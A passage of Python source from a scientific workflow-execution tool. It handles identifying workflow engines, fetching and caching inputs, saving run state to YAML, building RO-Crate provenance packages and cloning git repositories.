                                      local_config=self.local_config, engineTweaksDir=self.engineTweaksDir,
                                      cacheWorkflowDir=self.cacheWorkflowDir,
                                      cacheWorkflowInputsDir=self.cacheWorkflowInputsDir,
                                      workDir=self.workDir,
                                      outputsDir=self.outputsDir, intermediateDir=self.intermediateDir,
                                      tempDir=self.tempDir, secure_exec=self.secure or self.paranoidMode,
                                      allowOther=self.allowOther, config_directory=self.config_directory)

            try:
                engineVer, candidateLocalWorkflow = engine.identifyWorkflow(localWorkflow)
                self.logger.debug("Tested engine {} {}".format(engineDesc.trs_descriptor, engineVer))
                if engineVer is not None:
                    break
            except WorkflowEngineException:
                # TODO: store the exceptions, to be shown if no workflow is recognized
                pass
        else:
            raise WFException('No engine recognized a workflow at {}'.format(repoURL))
    else:
        # The engine kind is already fixed (e.g. declared by the TRS answer)
        self.logger.debug("Fixed engine " + engineDesc.trs_descriptor)
        engine = engineDesc.clazz(cacheDir=self.cacheDir, workflow_config=self.workflow_config,
                                  local_config=self.local_config, engineTweaksDir=self.engineTweaksDir,
                                  cacheWorkflowDir=self.cacheWorkflowDir,
                                  cacheWorkflowInputsDir=self.cacheWorkflowInputsDir,
                                  workDir=self.workDir,
                                  outputsDir=self.outputsDir, intermediateDir=self.intermediateDir,
                                  tempDir=self.tempDir, secure_exec=self.secure or self.paranoidMode,
                                  allowOther=self.allowOther, config_directory=self.config_directory)
        engineVer, candidateLocalWorkflow = engine.identifyWorkflow(localWorkflow)
        if engineVer is None:
            raise WFException(
                'Engine {} did not recognize a workflow at {}'.format(engine.workflowType.engineName, repoURL))

    self.repoDir = repoDir
    self.repoEffectiveCheckout = repoEffectiveCheckout
    self.engineDesc = engineDesc
    self.engine = engine
    self.engineVer = engineVer
    self.localWorkflow = candidateLocalWorkflow
def setupEngine(self, offline=False):
    """
    Materialize the workflow engine (fetching the workflow first if needed).

    :param offline: forwarded to fetchWorkflow when the engine is not yet known
    """
    # The engine is populated by self.fetchWorkflow()
    if self.engine is None:
        self.fetchWorkflow(offline=offline)

    # Prefer the already-materialized engine's workflow when available
    if self.materializedEngine is None:
        workflowToUse = self.localWorkflow
    else:
        workflowToUse = self.materializedEngine.workflow

    self.materializedEngine = self.engine.materializeEngine(workflowToUse, self.engineVer)
def materializeWorkflow(self, offline=False):
    """
    Ensure both the engine and the workflow (with its containers) are
    materialized, populating self.materializedEngine and self.listOfContainers.

    :param offline: forwarded to setupEngine / MaterializeWorkflow
    """
    if self.materializedEngine is None:
        self.setupEngine(offline=offline)

    # This information is badly needed for provenance
    if self.listOfContainers is not None:
        return

    self.materializedEngine, self.listOfContainers = \
        WorkflowEngine.MaterializeWorkflow(self.materializedEngine, offline=offline)
def addSchemeHandler(self, scheme, handler):
    """
    Register a fetch handler for a single URI scheme.

    :param scheme: URI scheme (case-insensitive; stored lowercased)
    :param handler: plain function / method used to fetch contents for the scheme
    :raises WFException: when handler is not one of the accepted callable kinds
    """
    if not isinstance(handler, (
            types.FunctionType, types.LambdaType, types.MethodType, types.BuiltinFunctionType,
            types.BuiltinMethodType)):
        # BUGFIX: grammar of the error message ("a invalid" -> "an invalid")
        raise WFException('Trying to set for scheme {} an invalid handler'.format(scheme))

    self.cacheHandler.addSchemeHandlers({scheme.lower(): handler})
def injectInputs(self, paths, workflowInputs_destdir=None, workflowInputs_cacheDir=None, lastInput=0):
    """
    Inject local files as workflow inputs, materializing them through the
    cache (unless in paranoid mode) and leaving symbolic links with their
    pretty filenames in the inputs directory.

    :param paths: iterable of local filesystem paths to inject
    :param workflowInputs_destdir: destination directory (defaults to self.inputsDir)
    :param workflowInputs_cacheDir: cache directory (defaults to self.cacheWorkflowInputsDir)
    :param lastInput: running ordinal used to disambiguate colliding filenames
    :return: the updated lastInput ordinal
    """
    if workflowInputs_destdir is None:
        workflowInputs_destdir = self.inputsDir

    if workflowInputs_cacheDir is None:
        workflowInputs_cacheDir = self.cacheWorkflowInputsDir

    # Paranoid mode disables caching altogether
    cacheable = not self.paranoidMode
    # The storage dir depends on whether it can be cached or not
    storeDir = workflowInputs_cacheDir if cacheable else workflowInputs_destdir
    for path in paths:
        # We are sending the context name thinking in the future,
        # as it could contain potential hints for authenticated access
        fileuri = parse.urlunparse(('file', '', os.path.abspath(path), '', '', ''))
        matContent = self.downloadInputFile(fileuri, workflowInputs_destdir=storeDir, ignoreCache=not cacheable, registerInCache=cacheable)

        # Now, time to create the symbolic link
        lastInput += 1

        prettyLocal = os.path.join(workflowInputs_destdir, matContent.prettyFilename)

        # Only "harden" (prefix with the ordinal) when the pretty name is
        # already taken by different content
        hardenPrettyLocal = False
        if os.path.islink(prettyLocal):
            oldLocal = os.readlink(prettyLocal)

            hardenPrettyLocal = oldLocal != matContent.local
        elif os.path.exists(prettyLocal):
            hardenPrettyLocal = True

        if hardenPrettyLocal:
            # Trying to avoid collisions on input naming
            prettyLocal = os.path.join(workflowInputs_destdir, str(lastInput) + '_' + matContent.prettyFilename)

        if not os.path.exists(prettyLocal):
            os.symlink(matContent.local, prettyLocal)

    return lastInput
def materializeInputs(self, offline: bool = False, lastInput=0):
    """
    Fetch every input declared in self.params into the inputs directory and
    keep the resulting MaterializedInput list in self.materializedParams.

    :param offline: forwarded to fetchInputs
    :param lastInput: starting ordinal used to disambiguate colliding filenames
    """
    materialized, _ = self.fetchInputs(
        self.params,
        workflowInputs_destdir=self.inputsDir,
        workflowInputs_cacheDir=self.cacheWorkflowInputsDir,
        offline=offline,
        lastInput=lastInput
    )
    self.materializedParams = materialized
def fetchInputs(self, params, workflowInputs_destdir: AbsPath = None, workflowInputs_cacheDir: AbsPath = None,
                prefix='', lastInput=0, offline: bool = False) -> Tuple[List[MaterializedInput], int]:
    """
    Fetch the input files for the workflow execution.
    All the inputs must be URLs or CURIEs from identifiers.org / n2t.net.

    :param params: Optional params for the workflow execution.
    :param workflowInputs_destdir: directory where materialized inputs (or
    symlinks to the cache) are placed
    :param prefix: dotted key prefix accumulated while recursing into nested params
    :param workflowInputs_cacheDir: cache directory for downloaded contents
    :param lastInput: running ordinal used to disambiguate colliding filenames
    :param offline:
    :type params: dict
    :type prefix: str
    :return: a tuple with the list of MaterializedInput and the updated lastInput
    """
    theInputs = []

    # Accept both dict-shaped and list-shaped param blocks
    paramsIter = params.items() if isinstance(params, dict) else enumerate(params)
    for key, inputs in paramsIter:
        # The fully-qualified (dotted) key of this input
        linearKey = prefix + key
        if isinstance(inputs, dict):
            inputClass = inputs.get('c-l-a-s-s')
            if inputClass is not None:
                if inputClass in ("File", "Directory"):  # input files
                    inputDestDir = workflowInputs_destdir
                    globExplode = None
                    if inputClass == 'Directory':
                        # We have to autofill this with the outputs directory,
                        # so results are properly stored (without escaping the jail)
                        if inputs.get('autoFill', False):
                            if inputs.get('autoPrefix', True):
                                autoFilledDir = os.path.join(self.outputsDir, *linearKey.split('.'))
                            else:
                                autoFilledDir = self.outputsDir

                            theInputs.append(MaterializedInput(linearKey, [autoFilledDir]))
                            continue

                        globExplode = inputs.get('globExplode')

                        # This is to nest the directory where to place the different files
                        inputDestDir = os.path.join(inputDestDir, *linearKey.split('.'))
                        os.makedirs(inputDestDir, exist_ok=True)

                    remote_files = inputs['url']
                    # 'cache': False, and paranoid mode, bypass the cache
                    cacheable = not self.paranoidMode if inputs.get('cache', True) else False
                    if not isinstance(remote_files, list):  # url can be a single value or a list
                        remote_files = [remote_files]

                    remote_pairs = []
                    # The storage dir depends on whether it can be cached or not
                    storeDir = workflowInputs_cacheDir if cacheable else inputDestDir
                    for remote_file in remote_files:
                        # We are sending the context name thinking in the future,
                        # as it could contain potential hints for authenticated access
                        contextName = inputs.get('security-context')
                        matContent = self.downloadInputFile(remote_file,
                                                            workflowInputs_destdir=storeDir,
                                                            contextName=contextName,
                                                            offline=offline,
                                                            ignoreCache=not cacheable,
                                                            registerInCache=cacheable,
                                                            )

                        # Now, time to create the symbolic link
                        lastInput += 1

                        prettyLocal = os.path.join(inputDestDir, matContent.prettyFilename)

                        # Only "harden" (prefix with the ordinal) when the
                        # pretty name is already taken by different content
                        hardenPrettyLocal = False
                        if os.path.islink(prettyLocal):
                            oldLocal = os.readlink(prettyLocal)

                            hardenPrettyLocal = oldLocal != matContent.local
                        elif os.path.exists(prettyLocal):
                            hardenPrettyLocal = True

                        if hardenPrettyLocal:
                            # Trying to avoid collisions on input naming
                            prettyLocal = os.path.join(inputDestDir,
                                                       str(lastInput) + '_' + matContent.prettyFilename)

                        if not os.path.exists(prettyLocal):
                            os.symlink(matContent.local, prettyLocal)

                        if globExplode is not None:
                            # Explode the fetched directory: every glob match
                            # becomes its own MaterializedContent, with an URI
                            # derived from the original one
                            prettyLocalPath = pathlib.Path(prettyLocal)
                            matParse = parse.urlparse(matContent.uri)
                            for exp in prettyLocalPath.glob(globExplode):
                                relPath = exp.relative_to(prettyLocalPath)
                                relName = str(relPath)
                                relExpPath = matParse.path
                                if relExpPath[-1] != '/':
                                    relExpPath += '/'
                                relExpPath += '/'.join(map(lambda part: parse.quote_plus(part), relPath.parts))
                                expUri = parse.urlunparse((matParse.scheme, matParse.netloc, relExpPath, matParse.params, matParse.query, matParse.fragment))
                                remote_pairs.append(
                                    MaterializedContent(
                                        local=str(exp),
                                        uri=expUri,
                                        prettyFilename=relName,
                                        metadata_array=matContent.metadata_array,
                                        kind=ContentKind.Directory if exp.is_dir() else ContentKind.File
                                    )
                                )
                        else:
                            # NOTE(review): this positional call implies field
                            # order (local, uri, prettyFilename, kind,
                            # metadata_array) — confirm against MaterializedContent
                            remote_pairs.append(
                                MaterializedContent(prettyLocal, matContent.uri, matContent.prettyFilename,
                                                    matContent.kind, matContent.metadata_array))

                    theInputs.append(MaterializedInput(linearKey, remote_pairs))
                else:
                    raise WFException(
                        'Unrecognized input class "{}", attached to "{}"'.format(inputClass, linearKey))
            else:
                # possible nested files
                newInputsAndParams, lastInput = self.fetchInputs(inputs,
                                                                 workflowInputs_destdir=workflowInputs_destdir,
                                                                 workflowInputs_cacheDir=workflowInputs_cacheDir,
                                                                 prefix=linearKey + '.', lastInput=lastInput,
                                                                 offline=offline)
                theInputs.extend(newInputsAndParams)
        else:
            # Plain values are passed through as-is (normalized to a list)
            if not isinstance(inputs, list):
                inputs = [inputs]
            theInputs.append(MaterializedInput(linearKey, inputs))

    return theInputs, lastInput
def stageWorkDir(self):
    """
    This method is here to simplify the understanding of the needed steps

    Runs, in order: fetchWorkflow, setupEngine, materializeWorkflow,
    materializeInputs and marshallStage.

    :return: the instance id of the staged working directory
    """
    for staging_step in (
            self.fetchWorkflow,
            self.setupEngine,
            self.materializeWorkflow,
            self.materializeInputs,
            self.marshallStage,
    ):
        staging_step()

    return self.instanceId
def workdirToBagit(self):
    """
    BEWARE: This is a destructive step! So, once run, there is no back!

    Converts the working directory in place into a BagIt bag, keeping the
    resulting bag object in self.bag.
    """
    self.bag = bagit.make_bag(self.workDir)
# Cardinality used when an output description does not declare one: exactly 1
DefaultCardinality = '1'
# Symbolic cardinality -> (min, max) number of occurrences of an output
CardinalityMapping = {
    '1': (1, 1),
    '?': (0, 1),
    '*': (0, sys.maxsize),
    '+': (1, sys.maxsize),
}

# Maps the textual 'c-l-a-s-s' value of an output description to ContentKind
OutputClassMapping = {
    ContentKind.File.name: ContentKind.File,
    ContentKind.Directory.name: ContentKind.Directory,
    ContentKind.Value.name: ContentKind.Value,
}
def parseExpectedOutputs(self, outputs: Union[List[Any], Mapping[str, Any]]) -> List[ExpectedOutput]:
    """
    Translate the raw 'outputs' staging block into ExpectedOutput instances.

    Each output description may declare:
    * 'c-l-a-s-s': File / Directory / Value (defaults to File)
    * 'glob': glob pattern locating the produced content (empty string -> None)
    * 'cardinality': an int, a [min, max] pair, or one of '1', '?', '*', '+'
    * 'preferredName': preferred filename for the output

    :param outputs: list-shaped or dict-shaped outputs block
    :return: list of ExpectedOutput instances
    """
    expectedOutputs = []

    # TODO: implement parsing of outputs
    # Accept both list-shaped and dict-shaped outputs blocks
    outputsIter = outputs.items() if isinstance(outputs, dict) else enumerate(outputs)

    for outputKey, outputDesc in outputsIter:
        # The glob pattern (an empty pattern means no pattern at all)
        patS = outputDesc.get('glob')
        if patS is not None:
            if len(patS) == 0:
                patS = None

        # Parsing the cardinality
        cardS = outputDesc.get('cardinality')
        cardinality = None
        if cardS is not None:
            if isinstance(cardS, int):
                # A non-positive count degrades to "optional single"
                if cardS < 1:
                    cardinality = (0, 1)
                else:
                    cardinality = (cardS, cardS)
            elif isinstance(cardS, list):
                cardinality = (int(cardS[0]), int(cardS[1]))
            else:
                cardinality = self.CardinalityMapping.get(cardS)

        if cardinality is None:
            cardinality = self.CardinalityMapping[self.DefaultCardinality]

        eOutput = ExpectedOutput(
            name=outputKey,
            # BUGFIX: the fallback used to be ContentKind.File.name (the
            # string 'File') while the mapping values are ContentKind
            # members; default to the enum member for a consistent type
            kind=self.OutputClassMapping.get(outputDesc.get('c-l-a-s-s'), ContentKind.File),
            preferredFilename=outputDesc.get('preferredName'),
            cardinality=cardinality,
            glob=patS,
        )
        expectedOutputs.append(eOutput)

    return expectedOutputs
def executeWorkflow(self, offline : bool = False):
    """
    Execute the staged workflow, keeping exit value, augmented inputs and
    checked outputs on the instance, and persisting the execution state.

    :param offline: forwarded to unmarshallStage
    """
    self.unmarshallStage(offline=offline)

    self.exitVal, self.augmentedInputs, self.matCheckOutputs = WorkflowEngine.ExecuteWorkflow(
        self.materializedEngine,
        self.materializedParams,
        self.outputs
    )

    self.logger.debug(self.exitVal)
    self.logger.debug(self.augmentedInputs)
    self.logger.debug(self.matCheckOutputs)

    # TODO: implement store serialized version of exitVal, augmentedInputs and matCheckOutputs
    self.marshallExecute()
def exportResults(self):
    """
    Export the execution results, restoring the execution state first.

    The actual export step is still pending (see TODO); currently only the
    export marshalling is performed.
    """
    self.unmarshallExecute(offline=True)

    # TODO
    self.marshallExport()
def marshallConfig(self, overwrite : bool = False):
    """
    Persist the staging definition and the security contexts as YAML files
    inside the metadata directory.

    :param overwrite: when True, existing files are rewritten; otherwise the
    files are only created when missing
    """
    workflow_meta_file = os.path.join(self.metaDir, WORKDIR_WORKFLOW_META_FILE)
    if overwrite or not os.path.exists(workflow_meta_file):
        with open(workflow_meta_file, mode='w', encoding='utf-8') as wmF:
            # Reconstruct the staging definition from the live attributes
            workflow_meta = {
                'workflow_id': self.id,
                'paranoid_mode': self.paranoidMode
            }
            if self.version_id is not None:
                workflow_meta['version'] = self.version_id
            if self.descriptor_type is not None:
                workflow_meta['workflow_type'] = self.descriptor_type
            if self.trs_endpoint is not None:
                workflow_meta['trs_endpoint'] = self.trs_endpoint
            if self.workflow_config is not None:
                workflow_meta['workflow_config'] = self.workflow_config
            if self.params is not None:
                workflow_meta['params'] = self.params
            if self.outputs is not None:
                # Serialized keyed by output name
                outputs = { output.name: output for output in self.outputs }
                workflow_meta['outputs'] = outputs

            yaml.dump(marshall_namedtuple(workflow_meta), wmF, Dumper=YAMLDumper)

    creds_file = os.path.join(self.metaDir, WORKDIR_SECURITY_CONTEXT_FILE)
    if overwrite or not os.path.exists(creds_file):
        with open(creds_file, mode='w', encoding='utf-8') as crF:
            yaml.dump(marshall_namedtuple(self.creds_config), crF, Dumper=YAMLDumper)
def marshallStage(self, exist_ok : bool = True):
    """
    Persist the staging state (repo, engine and materialized params) into
    the metadata directory, so a later process can resume from it.

    :param exist_ok: when False, an already marshalled stage raises WFException
    :raises WFException: when exist_ok is False and the stage was already marshalled
    """
    if not self.stageMarshalled:
        # The staging definition itself is stored first (only when missing)
        self.marshallConfig(overwrite=False)

        marshalled_stage_file = os.path.join(self.metaDir, WORKDIR_MARSHALLED_STAGE_FILE)
        if os.path.exists(marshalled_stage_file):
            if not exist_ok:
                raise WFException("Marshalled stage file already exists")
            self.logger.debug("Marshalled stage file {} already exists".format(marshalled_stage_file))
        else:
            stage = {
                'repoURL': self.repoURL,
                'repoTag': self.repoTag,
                'repoRelPath': self.repoRelPath,
                'repoEffectiveCheckout': self.repoEffectiveCheckout,
                'engineDesc': self.engineDesc,
                'engineVer': self.engineVer,
                'materializedEngine': self.materializedEngine,
                'containers': self.listOfContainers,
                'materializedParams': self.materializedParams
                # TODO: check nothing essential was left
            }

            self.logger.debug("Creating marshalled stage file {}".format(marshalled_stage_file))
            with open(marshalled_stage_file, mode='w', encoding='utf-8') as msF:
                marshalled_stage = marshall_namedtuple(stage)
                yaml.dump(marshalled_stage, msF, Dumper=YAMLDumper)

        self.stageMarshalled = True
    elif not exist_ok:
        raise WFException("Marshalled stage file already exists")
def unmarshallStage(self, offline : bool = False):
    """
    Restore the staging state previously stored by marshallStage, and
    re-materialize the engine from it.

    :param offline: accepted for symmetry; the internal setupEngine call is
    always done with offline=True, as everything was fetched when staging
    :raises WFException: when the marshalled stage file is missing or its
    content cannot be unmarshalled
    """
    if not self.stageMarshalled:
        marshalled_stage_file = os.path.join(self.metaDir, WORKDIR_MARSHALLED_STAGE_FILE)
        if not os.path.exists(marshalled_stage_file):
            raise WFException("Marshalled stage file does not exists. Stage state was not stored")

        self.logger.debug("Parsing marshalled stage state file {}".format(marshalled_stage_file))
        with open(marshalled_stage_file, mode='r', encoding='utf-8') as msF:
            marshalled_stage = yaml.load(msF, Loader=YAMLLoader)

            try:
                # globals() gives the unmarshaller access to the classes
                # referenced by the serialized content
                stage = unmarshall_namedtuple(marshalled_stage, globals())
                self.repoURL = stage['repoURL']
                self.repoTag = stage['repoTag']
                self.repoRelPath = stage['repoRelPath']
                self.repoEffectiveCheckout = stage['repoEffectiveCheckout']
                self.engineDesc = stage['engineDesc']
                self.engineVer = stage['engineVer']
                self.materializedEngine = stage['materializedEngine']
                self.listOfContainers = stage['containers']
                self.materializedParams = stage['materializedParams']

                # This is needed to properly set up the materializedEngine
                self.setupEngine(offline=True)
            except Exception as e:
                raise WFException("Error while unmarshalling content from stage state file {}. Reason: {}".format(marshalled_stage_file,e))

        self.stageMarshalled = True
def marshallExecute(self, exist_ok : bool = True):
    """
    Persist the execution state (exit value, augmented inputs and
    checked outputs) as a YAML file in the metadata directory.

    The stage state is marshalled first, as the execution state only
    makes sense on top of it.

    :param exist_ok: when False, an already-marshalled state is an error
    :raises WFException: when the state was already marshalled and
        exist_ok is False
    """
    if self.executionMarshalled:
        # Already done; only complain when a fresh marshall was demanded
        if not exist_ok:
            raise WFException("Marshalled execution file already exists")
        return
    self.marshallStage(exist_ok=exist_ok)
    marshalled_execution_file = os.path.join(self.metaDir, WORKDIR_MARSHALLED_EXECUTE_FILE)
    if os.path.exists(marshalled_execution_file):
        if not exist_ok:
            raise WFException("Marshalled execution file already exists")
        self.logger.debug("Marshalled execution file {} already exists".format(marshalled_execution_file))
    else:
        execution_state = {
            'exitVal': self.exitVal,
            'augmentedInputs': self.augmentedInputs,
            'matCheckOutputs': self.matCheckOutputs
            # TODO: check nothing essential was left
        }
        self.logger.debug("Creating marshalled execution file {}".format(marshalled_execution_file))
        with open(marshalled_execution_file, mode='w', encoding='utf-8') as meF:
            yaml.dump(marshall_namedtuple(execution_state), meF, Dumper=YAMLDumper)
    self.executionMarshalled = True
def unmarshallExecute(self, offline : bool = True):
    """
    Restore the execution state previously saved by marshallExecute.

    The stage state is unmarshalled first, as the execution state only
    makes sense on top of a restored stage.

    :param offline: passed through to unmarshallStage
    :raises WFException: when the marshalled execution file is missing
        or its contents cannot be unmarshalled
    """
    if not self.executionMarshalled:
        self.unmarshallStage(offline=offline)
        marshalled_execution_file = os.path.join(self.metaDir, WORKDIR_MARSHALLED_EXECUTE_FILE)
        if not os.path.exists(marshalled_execution_file):
            raise WFException("Marshalled execution file does not exists. Execution state was not stored")
        self.logger.debug("Parsing marshalled execution state file {}".format(marshalled_execution_file))
        with open(marshalled_execution_file, mode='r', encoding='utf-8') as meF:
            marshalled_execution = yaml.load(meF, Loader=YAMLLoader)
            try:
                execution = unmarshall_namedtuple(marshalled_execution, globals())
                self.exitVal = execution['exitVal']
                self.augmentedInputs = execution['augmentedInputs']
                self.matCheckOutputs = execution['matCheckOutputs']
            except Exception as e:
                # Chain the original exception for easier debugging
                raise WFException("Error while unmarshalling content from execution state file {}. Reason: {}".format(marshalled_execution_file, e)) from e
        self.executionMarshalled = True
def marshallExport(self, exist_ok : bool = True):
    """
    Persist the exported-results state as a YAML file in the metadata
    directory. Execution (and, transitively, stage) state is
    marshalled first.

    :param exist_ok: when False, an already-marshalled state is an error
    :raises WFException: when the state was already marshalled and
        exist_ok is False
    """
    if self.exportMarshalled:
        # Already done; only complain when a fresh marshall was demanded
        if not exist_ok:
            raise WFException("Marshalled export results file already exists")
        return
    self.marshallExecute(exist_ok=exist_ok)
    marshalled_export_file = os.path.join(self.metaDir, WORKDIR_MARSHALLED_EXPORT_FILE)
    if os.path.exists(marshalled_export_file):
        if not exist_ok:
            raise WFException("Marshalled export results file already exists")
        self.logger.debug("Marshalled export results file {} already exists".format(marshalled_export_file))
    else:
        exported_results = {
            # TODO
        }
        self.logger.debug("Creating marshalled export results file {}".format(marshalled_export_file))
        with open(marshalled_export_file, mode='w', encoding='utf-8') as meF:
            yaml.dump(marshall_namedtuple(exported_results), meF, Dumper=YAMLDumper)
    self.exportMarshalled = True
def unmarshallExport(self, offline : bool = True):
    """
    Restore the exported-results state previously saved by
    marshallExport, unmarshalling the execution state first.

    :param offline: passed through to unmarshallExecute
    :raises WFException: when the marshalled export results file is
        missing or its contents cannot be unmarshalled
    """
    if not self.exportMarshalled:
        self.unmarshallExecute(offline=offline)
        marshalled_export_file = os.path.join(self.metaDir, WORKDIR_MARSHALLED_EXPORT_FILE)
        if not os.path.exists(marshalled_export_file):
            raise WFException("Marshalled export results file does not exists. Export results state was not stored")
        self.logger.debug("Parsing marshalled export results state file {}".format(marshalled_export_file))
        with open(marshalled_export_file, mode='r', encoding='utf-8') as meF:
            marshalled_export = yaml.load(meF, Loader=YAMLLoader)
            try:
                exported_results = unmarshall_namedtuple(marshalled_export, globals())
                # TODO
            except Exception as e:
                # Chain the original exception for easier debugging
                raise WFException(f"Error while unmarshalling content from export results state file {marshalled_export_file}. Reason: {e}") from e
        self.exportMarshalled = True
def createStageResearchObject(self, doMaterializedROCrate : bool = False):
    """
    Create RO-crate from stage provenance.

    Currently a stub: it only restores the stage state; the actual
    RO-Crate generation is still pending (see TODOs below).

    :param doMaterializedROCrate: reserved flag, not honoured yet
    """
    # TODO: implement deserialization
    self.unmarshallStage(offline=True)
    # TODO: implement logic of doMaterializedROCrate
    # TODO
    pass
def createResultsResearchObject(self, doMaterializedROCrate : bool = False):
    """
    Create RO-crate from execution provenance.

    Either reuses the crate previously downloaded from WorkflowHub, or
    builds one from scratch for GitHub-hosted workflows, adds input
    provenance, and writes it to the outputs directory as
    execution.crate.zip.

    :param doMaterializedROCrate: reserved flag, not honoured yet
    :raises WFException: when a fresh crate must be built but the
        workflow is not hosted on github.com
    """
    # TODO: implement deserialization
    self.unmarshallExport(offline=True)
    # TODO: implement logic of doMaterializedROCrate
    # TODO: digest the results from executeWorkflow plus all the provenance
    # Create RO-crate using crate.zip downloaded from WorkflowHub
    if os.path.isfile(str(self.cacheROCrateFilename)):
        wfCrate = rocrate.ROCrate(self.cacheROCrateFilename)
    # Create RO-Crate using rocrate_api
    # TODO no exists the version implemented for Nextflow in rocrate_api
    else:
        # FIXME: What to do when workflow is in git repository different from GitHub??
        # FIXME: What to do when workflow is not in a git repository??
        wf_path = os.path.join(self.localWorkflow.dir, self.localWorkflow.relPath)
        wfCrate, compLang = self.materializedEngine.instance.getEmptyCrateAndComputerLanguage(
            self.localWorkflow.langVersion)
        wf_url = self.repoURL.replace(".git", "/") + "tree/" + self.repoTag + "/" + os.path.dirname(
            self.localWorkflow.relPath)
        # TODO create method to create wf_url
        matWf = self.materializedEngine.workflow
        parsed_repo_url = parse.urlparse(self.repoURL)
        # Only GitHub-hosted workflows get a raw entrypoint URL here
        if parsed_repo_url.netloc == 'github.com':
            parsed_repo_path = parsed_repo_url.path.split('/')
            repo_name = parsed_repo_path[2]
            if repo_name.endswith('.git'):
                repo_name = repo_name[:-4]
            wf_entrypoint_path = [
                '',  # Needed to prepend a slash
                parsed_repo_path[1],
                repo_name,
                matWf.effectiveCheckout,
                self.localWorkflow.relPath
            ]
            wf_entrypoint_url = parse.urlunparse(
                ('https', 'raw.githubusercontent.com', '/'.join(wf_entrypoint_path), '', '', ''))
        else:
            raise WFException("FIXME: Unsupported http(s) git repository {}".format(self.repoURL))
        # TODO assign something meaningful to cwl
        cwl = True
        workflow_path = Path(wf_path)
        wf_file = wfCrate.add_workflow(
            str(workflow_path), workflow_path.name, fetch_remote=False,
            main=True, lang=compLang, gen_cwl=(cwl is None)
        )
        # This is needed, as it is not automatically added when the
        # `lang` argument in workflow creation was not a string
        wfCrate.add(compLang)
        # if the source is a remote URL then add https://schema.org/codeRepository
        # property to it this can be checked by checking if the source is a URL
        # instead of a local path
        wf_file.properties()['url'] = wf_entrypoint_url
        wf_file.properties()['codeRepository'] = wf_url
        # if 'url' in wf_file.properties():
        #    wf_file['codeRepository'] = wf_file['url']
        # TODO: add extra files, like nextflow.config in the case of
        # Nextflow workflows, the diagram, an abstract CWL
        # representation of the workflow (when it is not a CWL workflow)
        # etc...
        # for file_entry in include_files:
        #    wfCrate.add_file(file_entry)
        wfCrate.isBasedOn = wf_url
    # Add inputs provenance to RO-crate
    for in_item in self.augmentedInputs:
        if isinstance(in_item, MaterializedInput):
            itemInValues = in_item.values[0]
            if isinstance(itemInValues, MaterializedContent):
                # TODO: embed metadata_array in some way
                itemInSource = itemInValues.local
                if os.path.isfile(itemInSource):
                    properties = {
                        'name': in_item.name,
                        'url': itemInValues.uri
                    }
                    wfCrate.add_file(source=itemInSource, properties=properties)
                elif os.path.isdir(itemInSource):
                    self.logger.error("FIXME: input directory / dataset handling in RO-Crate")
                else:
                    pass # TODO raise Exception
            # TODO digest other types of inputs
    # Add outputs provenance to RO-crate
    # for out_item in self.matCheckOutputs:
    #     if isinstance(out_item, MaterializedOutput):
    #         itemOutKind = out_item.kind.value
    #         itemOutValues = out_item.values[0]
    #         itemOutSource = itemOutValues.local
    #         properties = {'name': out_item.name}
    #         if itemOutKind == "dir":
    #             if isinstance(itemOutValues, GeneratedDirectoryContent):
    #                 if os.path.isdir(itemOutSource):
    #                     dirProperties = dict.fromkeys(['values'])
    #                     dirProperties['values'] = itemOutValues.values
    #                     properties.update(dirProperties)
    #                     wfCrate.add_directory(source=itemOutSource, properties=properties)
    #
    #             else:
    #                 pass # TODO raise Exception
    #
    #         elif itemOutKind == "file":
    #             if isinstance(itemOutValues, GeneratedContent):
    #                 if os.path.isfile(itemOutSource):
    #                     fileProperties = {
    #                         'uri': itemOutValues.uri
    #                     }
    #                     properties.update(fileProperties)
    #                     wfCrate.add_file(source=itemOutSource, properties=properties)
    #
    #             else:
    #                 pass # TODO raise Exception
    #         # elif itemOutKind == "val":
    #         else:
    #             pass # TODO raise Exception
    # Save RO-crate as execution.crate.zip
    wfCrate.writeZip(os.path.join(self.outputsDir, "execution.crate"))
    self.logger.info("RO-Crate created: {}".format(self.outputsDir))
    # TODO error handling
def doMaterializeRepo(self, repoURL, repoTag: RepoTag = None, doUpdate: bool = True) -> Tuple[AbsPath, RepoTag]:
    """
    Clone (or update) a git repository into the workflow cache, and
    return where it was left plus the effective checkout.

    :param repoURL: the git repository URL
    :param repoTag: tag / branch / commit to checkout (None for the
        repository default)
    :param doUpdate: when the clone already exists, pull updates
    :return: destination directory and effective checkout (HEAD hash)
    :raises WFException: when directories cannot be created or any git
        operation fails
    """
    # Cache layout: <cacheWorkflowDir>/<sha1(repoURL)>/<sha1(repoTag)>
    # (sha1 is used only for stable directory naming, not for security)
    repo_hashed_id = hashlib.sha1(repoURL.encode('utf-8')).hexdigest()
    repo_hashed_tag_id = hashlib.sha1(b'' if repoTag is None else repoTag.encode('utf-8')).hexdigest()
    # Assure directory exists before next step
    repo_destdir = os.path.join(self.cacheWorkflowDir, repo_hashed_id)
    if not os.path.exists(repo_destdir):
        try:
            os.makedirs(repo_destdir)
        except IOError:
            errstr = "ERROR: Unable to create intermediate directories for repo {}. ".format(repoURL)
            raise WFException(errstr)
    repo_tag_destdir = os.path.join(repo_destdir, repo_hashed_tag_id)
    # We are assuming that, if the directory does exist, it contains the repo
    doRepoUpdate = True
    if not os.path.exists(repo_tag_destdir):
        # Try cloning the repository without initial checkout
        if repoTag is not None:
            gitclone_params = [
                self.git_cmd, 'clone', '-n', '--recurse-submodules', repoURL, repo_tag_destdir
            ]
            # Now, checkout the specific commit
            gitcheckout_params = [
                self.git_cmd, 'checkout', repoTag
            ]
        else:
            # We know nothing about the tag, or checkout
            gitclone_params = [
                self.git_cmd, 'clone', '--recurse-submodules', repoURL, repo_tag_destdir
            ]
            gitcheckout_params = None
    elif doUpdate:
        # Existing clone: pull instead of cloning again
        gitclone_params = None
        gitcheckout_params = [
            self.git_cmd, 'pull', '--recurse-submodules'
        ]
        if repoTag is not None:
            gitcheckout_params.extend(['origin', repoTag])
    else:
        doRepoUpdate = False
    if doRepoUpdate:
        # Capture git output in temp files so failures can be reported
        with tempfile.NamedTemporaryFile() as git_stdout, tempfile.NamedTemporaryFile() as git_stderr:
            # First, (bare) clone
            retval = 0
            if gitclone_params is not None:
                retval = subprocess.call(gitclone_params, stdout=git_stdout, stderr=git_stderr)
            # Then, checkout (which can be optional)
            if retval == 0 and (gitcheckout_params is not None):
                retval = subprocess.Popen(gitcheckout_params, stdout=git_stdout, stderr=git_stderr,
                                          cwd=repo_tag_destdir).wait()
            # Last, submodule preparation
            if retval == 0:
                # Last, initialize submodules
                gitsubmodule_params = [
                    self.git_cmd, 'submodule', 'update', '--init', '--recursive'
                ]
